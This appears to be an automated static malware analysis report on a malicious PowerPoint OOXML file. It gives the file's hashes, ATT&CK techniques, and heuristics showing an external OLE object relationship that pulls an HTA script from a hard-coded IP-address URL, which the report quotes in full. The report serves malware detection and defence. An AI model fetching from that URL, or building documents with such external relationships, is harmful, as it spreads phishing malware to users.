Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ac31b548d58e8e9e…

MALICIOUS

Office (OOXML)

29.7 KB Created: 2017-09-29 02:54:17 UTC Authoring application: Microsoft Office PowerPoint 14.0000 First seen: 2017-11-20
MD5: db1a10cc813e4b3290cf88db2af0b736 SHA-1: 08cf2c855c36e83331cec201747010c69cbb280b SHA-256: ac31b548d58e8e9e149d248a734a454b0697402486cadd44fcb51d0ecadc3849
102 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains heuristics indicating an external OLE object relationship pointing to an HTA file hosted on the IP address 97.64.28.21. This suggests the document is designed to trick the user into downloading and executing a malicious script from the specified URL, likely as part of a phishing campaign.

Heuristics 3

  • MSHTML-style external object relationship critical CVE related OFFICE_MSHTML_EXTERNAL_OBJECT
    External relationship to http://97.64.28.21/web/02.hta — exploitable MSHTML/CAB/MHTML/HTA-style Office attack surface
  • External OLE object relationship high OOXML_EXTERNAL_OLE_OBJECT
    Document contains an oleObject relationship whose target is an external HTTP(S) URL. Office resolves this through OLE/object update paths rather than as a normal user-clicked hyperlink.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://97.64.28.21/web/02.hta In document text (OOXML body / shared strings)